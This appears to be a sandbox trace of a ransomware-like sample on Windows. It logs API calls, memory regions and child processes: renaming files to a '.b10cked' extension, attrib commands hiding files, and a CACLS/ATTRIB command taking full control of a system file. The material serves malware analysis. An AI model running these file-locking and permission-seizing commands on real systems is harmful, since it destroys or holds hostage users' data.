GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\directories.acrodata.b10cked" (normalized: "c:\\users\\alluse~1\\adobe\\acrobat\\10.0\\replic~1\\security\\directories.acrodata.b10cked")) returned 0xffffffff [0146.361] GetLastError () returned 0x2 [0146.361] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\DIRECT~1.ACR", fInfoLevelId=0x1, lpFindFileData=0x28ed24, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28ed24) returned 0x3a22d0 [0146.361] FindNextFileW (in: hFindFile=0x3a22d0, lpFindFileData=0x28ed24 | out: lpFindFileData=0x28ed24) returned 0 [0146.362] GetLastError () returned 0x12 [0146.362] FindClose (in: hFindFile=0x3a22d0 | out: hFindFile=0x3a22d0) returned 1 [0146.364] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\DIRECT~1.ACR", fInfoLevelId=0x1, lpFindFileData=0x3a1e60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3a1e60) returned 0x3a22d0 [0146.364] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\directories.acrodata.b10cked", nBufferLength=0x104, lpBuffer=0x28efbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\directories.acrodata.b10cked", lpFilePart=0x0) returned 0x53 [0146.364] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\directories.acrodata", nBufferLength=0x104, lpBuffer=0x28efbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\directories.acrodata", lpFilePart=0x0) returned 0x4b [0146.364] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\directories.acrodata" (normalized: "c:\\users\\alluse~1\\adobe\\acrobat\\10.0\\replic~1\\security\\directories.acrodata")) returned 0x2020 [0146.364] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\directories.acrodata" (normalized: "c:\\users\\alluse~1\\adobe\\acrobat\\10.0\\replic~1\\security\\directories.acrodata"), lpNewFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\directories.acrodata.b10cked" (normalized: "c:\\users\\alluse~1\\adobe\\acrobat\\10.0\\replic~1\\security\\directories.acrodata.b10cked"), dwFlags=0x3) returned 1 [0146.365] FindClose (in: hFindFile=0x3a22d0 | out: hFindFile=0x3a22d0) returned 1 [0146.365] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x28ef70 | out: _Buffer=" 1") returned 9 [0146.365] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.365] GetFileType (hFile=0x7) returned 0x2 [0146.365] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0146.365] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28eefc | out: lpMode=0x28eefc) returned 1 [0146.365] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.366] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x28ef30 | out: lpConsoleScreenBufferInfo=0x28ef30) returned 1 [0146.366] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0146.366] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x28ef70 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0146.367] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x28ef54, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28ef54*=0x1a) returned 1 [0146.367] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.367] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0146.367] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.367] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0146.367] _get_osfhandle (_FileHandle=0) returned 0x3 [0146.367] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0146.368] SetConsoleInputExeNameW () returned 0x1 [0146.368] GetConsoleOutputCP () returned 0x1b5 [0146.368] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0146.368] SetThreadUILanguage (LangId=0x0) returned 0x409 [0146.368] exit (_Code=0) Process: id = "207" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16f20" os_pid = "0xa68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "203" os_parent_pid = "0xac8" cmd_line = "attrib -r -s -h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17922 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 17923 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 17924 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 17925 start_va = 0x130000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 17926 start_va = 0x5b0000 end_va = 0x5b6fff entry_point = 0x5b0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 17927 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17928 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 17929 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 17930 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 17931 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 17932 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 17933 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 17934 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 17935 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 17936 start_va = 0x4c0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 17937 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 17938 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 17939 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 17940 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 17941 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 17942 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 17943 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 17944 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 17945 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 17946 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 17947 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 17948 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 17949 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 17950 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 17951 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 264 os_tid = 0xa58 Process: id = "208" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16ee0" os_pid = "0xb30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "203" os_parent_pid = "0xac8" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17992 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 17993 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 17994 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 17995 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 17996 start_va = 0xbc0000 end_va = 0xbc6fff entry_point = 0xbc0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 17997 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17998 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 17999 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18000 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 18001 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 18002 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18003 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 18004 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18005 start_va = 0x200000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 18006 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 18007 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 18008 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 18009 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 18010 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 18011 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 18012 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 18013 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 18014 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 18015 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 18016 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 18017 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 18018 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 18019 start_va = 0x340000 end_va = 0x407fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 18020 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 18021 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 265 os_tid = 0xb5c Process: id = "209" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16ee0" os_pid = "0x794" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "203" os_parent_pid = "0xac8" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18022 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18023 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 18024 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18025 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 18026 start_va = 0xd20000 end_va = 0xd26fff entry_point = 0xd20000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 18027 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18028 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 18029 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18030 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 18031 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 18032 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18033 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 18034 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18035 start_va = 0x180000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 18036 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 18037 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 18038 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 18039 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 18040 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 18041 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 18042 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 18043 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 18044 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 18045 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 18046 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 18047 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 18048 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 18049 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 18050 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 18051 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 266 os_tid = 0xba0 Process: id = "210" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16dc0" os_pid = "0xb10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18064 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18065 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 18066 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18067 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 18068 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 18069 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18070 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 18071 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18072 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 18073 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 18190 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18191 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 18192 start_va = 0xa0000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 18193 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 18194 start_va = 0x310000 end_va = 0x376fff entry_point = 0x310000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18195 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 18196 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 18197 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = 